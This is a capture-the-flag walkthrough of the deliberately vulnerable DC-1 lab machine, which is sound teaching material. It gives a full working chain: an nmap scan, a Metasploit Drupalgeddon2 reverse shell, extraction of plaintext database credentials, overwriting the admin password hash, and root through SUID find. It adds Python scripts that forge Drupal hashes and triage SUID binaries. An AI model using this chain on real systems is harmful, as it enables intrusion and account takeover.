3. DC-1 target machine


(image: dc-1_1.png)

I. Gathering target information

1. Known information:

  • IP: 192.168.245.193

2. Information gathered:

  • nmap scan of the open services
┌──(root㉿0xlo0p)-[/home/lo0p]
└─# nmap -sV -A 192.168.245.193
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-26 14:45 CST
Nmap scan report for 192.168.245.193
Host is up (0.34s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp  open  http    Apache httpd 2.2.22 ((Debian))
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-generator: Drupal 7 (http://drupal.org)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          50550/tcp6  status
|   100024  1          55270/udp   status
|   100024  1          55271/udp6  status
|_  100024  1          57092/tcp   status
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=10/26%OT=22%CT=1%CU=31332%PV=Y%DS=2%DC=T%G=Y%TM=6358D7
OS:C6%P=aarch64-unknown-linux-gnu)SEQ(SP=105%GCD=1%ISR=10A%TI=Z%II=I%TS=8)S
OS:EQ(SP=106%GCD=1%ISR=109%TI=Z%TS=8)OPS(O1=M54EST11NW4%O2=M54EST11NW4%O3=M
OS:54ENNT11NW4%O4=M54EST11NW4%O5=M54EST11NW4%O6=M54EST11)WIN(W1=3890%W2=389
OS:0%W3=3890%W4=3890%W5=3890%W6=3890)ECN(R=Y%DF=Y%T=40%W=3908%O=M54ENNSNW4%
OS:CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40
OS:%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 256/tcp)
HOP RTT       ADDRESS
1   429.93 ms 192.168.49.1
2   430.05 ms 192.168.245.193

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 82.49 seconds

Port 80 first: it is a CMS site, and the http-generator header already says Drupal 7. Check in msf whether there is an exploitable vulnerability for it.

  • Getting a shell on Drupal 7 with MSF
┌──(lo0p㉿0xlo0p)-[~]
└─$ msfconsole                                        

       =[ metasploit v6.1.27-dev                          ]
+ -- --=[ 2196 exploits - 1162 auxiliary - 400 post       ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: You can upgrade a shell to a Meterpreter 
session on many platforms using sessions -u 
<session_id>

msf6 > search Drupal

Matching Modules
================

   #  Name                                           Disclosure Date  Rank       Check  Description
   -  ----                                           ---------------  ----       -----  -----------
   0  exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Yes    Drupal CODER Module Remote Command Execution
   1  exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection
   2  exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  No     Drupal HTTP Parameter Key/Value SQL Injection
   3  auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Yes    Drupal OpenID External Entity Injection
   4  exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Yes    Drupal RESTWS Module Remote PHP Code Execution
   5  exploit/unix/webapp/drupal_restws_unserialize  2019-02-20       normal     Yes    Drupal RESTful Web Services unserialize() RCE
   6  auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Yes    Drupal Views Module Users Enumeration
   7  exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution

There are plenty of options; here I tried the 2018 Forms API property injection (Drupalgeddon 2, CVE-2018-7600).

msf6 > use exploit/unix/webapp/drupal_drupalgeddon2
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.245.193
rhosts => 192.168.245.193
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set lhost 192.168.49.245
lhost => 192.168.49.245
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run

[*] Started reverse TCP handler on 192.168.49.245:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Sending stage (39282 bytes) to 192.168.245.193
[*] Meterpreter session 1 opened (192.168.49.245:4444 -> 192.168.245.193:40926 ) at 2022-10-26 14:52:33 +0800

meterpreter > shell
Process 3438 created.
Channel 0 created.
ls    
COPYRIGHT.txt
INSTALL.mysql.txt
INSTALL.pgsql.txt
INSTALL.sqlite.txt
INSTALL.txt
LICENSE.txt
MAINTAINERS.txt
README.txt
UPGRADE.txt
authorize.php
cron.php
flag1.txt
includes
index.php
install.php
misc
modules
profiles
robots.txt
scripts
sites
themes
update.php
web.config
xmlrpc.php
cat flag1.txt
Every good CMS needs a config file - and so do you.

Once in the shell, the current user is www-data, a low-privilege account. The current directory contains flag1.txt, which hints at looking for the CMS site's config file, so I searched on Baidu.

Drupal default install directory structure - Tencent Cloud Developer Community (tencent.com)

The config file is sites/default/settings.php; the important part is excerpted below.

cat settings.php
<?php

/**
 *
 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
 *
 */

$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

/**

That gives the database name, user and password in cleartext, plus the flag2 hint, so the next step is to go into the database.

python -c 'import pty;pty.spawn("/bin/bash")'         
www-data@DC-1:/var/www$ mysql -u dbuser -pR0ck3t
mysql -u dbuser -pR0ck3t
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 79
Server version: 5.5.60-0+deb7u1 (Debian)

Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> use R0ck3t
use R0ck3t
ERROR 1044 (42000): Access denied for user 'dbuser'@'localhost' to database 'R0ck3t'
mysql> use drupaldb
use drupaldb
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+-----------------------------+
| Tables_in_drupaldb          |
+-----------------------------+
| users                       |
| users_roles                 |
| variable                    |
| views_display               |
| views_view                  |
| watchdog                    |
+-----------------------------+
80 rows in set (0.00 sec)

mysql> select * from users;
select * from users;
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| uid | name  | pass                                                    | mail              | theme | signature | signature_format | created    | access     | login      | status | timezone            | language | picture | init              | data |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
|   0 |       |                                                         |                   |       |           | NULL             |          0 |          0 |          0 |      0 | NULL                |          |       0 |                   | NULL |
|   1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | admin@example.com |       |           | NULL             | 1550581826 | 1550583852 | 1550582362 |      1 | Australia/Melbourne |          |       0 | admin@example.com | b:0; |
|   2 | Fred  | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | fred@example.org  |       |           | filtered_html    | 1550581952 | 1550582225 | 1550582225 |      1 | Australia/Melbourne |          |       0 | fred@example.org  | b:0; |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
3 rows in set (0.00 sec)

The python pty line at the top spawns an interactive shell first; without a tty the mysql client cannot be used from the meterpreter shell.

The query gives the site's users table, but the pass column holds Drupal 7 password hashes ($S$ prefix: salted, iterated SHA-512), not plaintext. Now think back to the flag2 hint:

Brute force and dictionary attacks aren't the only ways to gain access (and you WILL need access). What can you do with these credentials?

The hint says brute force isn't required, so I looked up how Drupal hashes its passwords on Baidu.

How to reset a Drupal 7 user password - 雨滴米 - ITeye blog

www-data@DC-1:/var/www$ php scripts/password-hash.sh "123456"
php scripts/password-hash.sh "123456"

password: 123456                hash: $S$D56GLmbar5i7NKVMZIoZdTFCRKejES4RMKp311ymjs6/0T4BOtoA

With the new hash, one UPDATE on the users table in mysql is enough to log in: Drupal trusts whatever is in the pass column, so write access to the database is as good as owning every account, and the existing hash never needs cracking.

mysql> update users set pass='$S$D56GLmbar5i7NKVMZIoZdTFCRKejES4RMKp311ymjs6/0T4BOtoA' where name='admin';
Query OK, 1 row affected (0.01 sec)
Rows matched: 1  Changed: 1  Warnings: 0
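To show what the password-hash.sh step actually computes, here is a Python reimplementation of Drupal 7's $S$ scheme as found in includes/password.inc (8-character salt, 2^count_log2 rounds of SHA-512 over hash||password, phpass-style base64, truncated to 55 characters). This is an added example, not code from the write-up or from Drupal; it verifies the hash printed above against 123456 and produces a fresh, database-ready hash without needing PHP on the target. The function names are my own.

```python
import hashlib
import hmac
import os
from typing import Optional

# Drupal 7 constants (includes/password.inc).
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55            # DRUPAL_HASH_LENGTH: stored hashes are cut to this
MIN_COUNT_LOG2 = 7          # DRUPAL_MIN_HASH_COUNT
MAX_COUNT_LOG2 = 30         # DRUPAL_MAX_HASH_COUNT
DEFAULT_COUNT_LOG2 = 15     # DRUPAL_HASH_COUNT -> 2**15 = 32768 SHA-512 rounds

# Hash printed by scripts/password-hash.sh "123456" in the write-up above.
PAGE_HASH = "$S$D56GLmbar5i7NKVMZIoZdTFCRKejES4RMKp311ymjs6/0T4BOtoA"


def password_base64_encode(data: bytes) -> str:
    """Port of _password_base64_encode(): 3 bytes -> 4 chars, low bits first (phpass style)."""
    out = []
    i, n = 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:              # PHP: if ($i++ >= $count) break;
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def drupal_crypt(password: str, setting: str) -> Optional[str]:
    """Port of _password_crypt('sha512', ...). Returns None on a malformed setting."""
    if len(password) > 512:     # Drupal's DoS guard against huge passwords
        return None
    setting = setting[:12]      # "$S$" + count char + 8-char salt
    if len(setting) != 12 or setting[0] != "$" or setting[2] != "$":
        return None
    count_log2 = ITOA64.find(setting[3])
    if not MIN_COUNT_LOG2 <= count_log2 <= MAX_COUNT_LOG2:
        return None
    salt = setting[4:12].encode("ascii")
    pw = password.encode("utf-8")
    digest = hashlib.sha512(salt + pw).digest()
    for _ in range(1 << count_log2):   # do { hash(hash . pw) } while (--count)
        digest = hashlib.sha512(digest + pw).digest()
    return (setting + password_base64_encode(digest))[:HASH_LENGTH]


def hash_password(password: str, count_log2: int = DEFAULT_COUNT_LOG2) -> str:
    """Port of user_hash_password(): random 6-byte salt encoded to 8 chars, "$S$" prefix."""
    setting = "$S$" + ITOA64[count_log2] + password_base64_encode(os.urandom(6))
    result = drupal_crypt(password, setting)
    if result is None:
        raise ValueError("count_log2 out of range")
    return result


def check_password(password: str, stored_hash: str) -> bool:
    """Port of user_check_password() for "$S$" hashes (legacy "U$"/"$P$" imports not handled)."""
    if not stored_hash.startswith("$S$"):
        return False
    computed = drupal_crypt(password, stored_hash)
    return computed is not None and hmac.compare_digest(computed.encode(), stored_hash.encode())


if __name__ == "__main__":
    print("page hash verifies as 123456:", check_password("123456", PAGE_HASH))
    new_hash = hash_password("123456")   # hash alphabet has no quotes, safe to paste into the UPDATE
    print("UPDATE users SET pass='%s' WHERE name='admin';" % new_hash)
```

Every run yields a different hash for the same password because the salt is random; all of them verify. The hash also encodes its own round count (the fourth character, "D" = 15), which is why a hash made on your attack box is accepted by the target without further configuration.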

After the change, log in to the web UI as admin, where the flag3 hint is waiting.

(image: dc-1_2.png, the flag3 page shown after logging in as admin)

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

The hint is fairly direct: look for executables with the SUID bit set.

www-data@DC-1:/var/www$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs
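As an added example that is not part of the write-up, here is the same enumeration as a Python script that also triages the result: which binaries appear in GTFOBins' SUID list, which are SUID on every stock Debian anyway, and which need a manual look (version, known CVEs). The GTFOBins set inside it is a partial, hand-picked subset (my assumption; check the site for the exact invocation), and the DC-1 list is copied from the find output above so the script runs offline.

```python
import os
import stat
from typing import List, Tuple

# Partial, hand-picked subset of GTFOBins' "SUID" entries (an assumption here, not the
# full list): names that give a root shell or root file read/write when setuid root.
# Confirm the exact invocation on https://gtfobins.github.io/ before relying on it.
GTFOBINS_SUID = {
    "find", "bash", "dash", "sh", "env", "python", "python2", "python3", "perl", "php",
    "vim", "vi", "less", "more", "awk", "gawk", "cp", "mv", "tee", "nmap", "node", "xxd",
}

# SUID by design on a stock Debian: expected, so lower priority (which is not "safe").
STOCK_DEBIAN_SUID = {
    "mount", "umount", "su", "ping", "ping6", "passwd", "chsh", "chfn", "newgrp",
    "gpasswd", "sudo", "pt_chown", "ssh-keysign", "dbus-daemon-launch-helper", "mount.nfs",
}

# What `find / -perm -4000 2>/dev/null` returned on DC-1 (copied from the write-up).
DC1_SUID_LIST = [
    "/bin/mount", "/bin/ping", "/bin/su", "/bin/ping6", "/bin/umount",
    "/usr/bin/at", "/usr/bin/chsh", "/usr/bin/passwd", "/usr/bin/newgrp",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/procmail", "/usr/bin/find",
    "/usr/sbin/exim4", "/usr/lib/pt_chown", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/eject/dmcrypt-get-device", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/sbin/mount.nfs",
]


def scan_suid(root: str) -> List[str]:
    """Python equivalent of `find ROOT -perm -4000 -type f`: regular files with S_ISUID set."""
    found = []
    skip = {"/proc", "/sys", "/dev", "/run"}   # pseudo-filesystems: noisy and can hang
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in skip]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)            # lstat: do not follow symlinks, like find
            except OSError:
                continue                       # unreadable entries, same as 2>/dev/null
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return sorted(found)


def triage(paths: List[str]) -> Tuple[List[str], List[str], List[str]]:
    """Split SUID paths into (GTFOBins hits, stock Debian, review manually) by basename."""
    hits, stock, review = [], [], []
    for p in paths:
        name = os.path.basename(p)
        if name in GTFOBINS_SUID:
            hits.append(p)
        elif name in STOCK_DEBIAN_SUID:
            stock.append(p)
        else:
            review.append(p)   # e.g. exim4, procmail, at: check version and known CVEs by hand
    return hits, stock, review


if __name__ == "__main__":
    import sys
    paths = scan_suid(sys.argv[1]) if len(sys.argv) > 1 else DC1_SUID_LIST
    hits, stock, review = triage(paths)
    for label, group in (("GTFOBins hits", hits), ("review manually", review), ("stock", stock)):
        print(label + ":")
        for p in group:
            print("  " + p)
```

Run with no argument it triages the DC-1 list and reports /usr/bin/find as the only GTFOBins hit; with a path argument (for example `/`) it walks the filesystem itself, which is useful on a target without find or with a find that has been restricted.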

find stands out immediately; GTFOBins (https://gtfobins.github.io/gtfobins/find/) documents the SUID abuse, and it gives a root shell straight away, along with the first key and the flag4 hint. One caveat: `-exec /bin/sh` works here because /bin/sh on this Debian 7 box is an old dash that keeps the setuid effective uid. bash (and newer dash) drop an effective uid that differs from the real one unless started with -p, so on a newer target use `find . -exec /bin/sh -p \; -quit`, which is the form GTFOBins gives.

www-data@DC-1:/var/www$ find . -exec /bin/sh \; -quit
find . -exec /bin/sh \; -quit
# whoami
whoami
root
# cd /home
cd /home
# ls
ls
flag4  local.txt
# cat local.txt
cat local.txt
a68de45775de2a3c662c669556630844
# cd flag4
cd flag4
# ls  
ls
flag4.txt
# cat flag4.txt
cat flag4.txt
Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy.  Or maybe it is?

Let's look in root's home directory.

# cd /root
cd /root
# ls
ls
proof.txt  thefinalflag.txt
# cat thefinalflag.txt
cat thefinalflag.txt
Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
# cat proof.txt
cat proof.txt
f06c05f682238e5ea97034108a9caa74

Done.
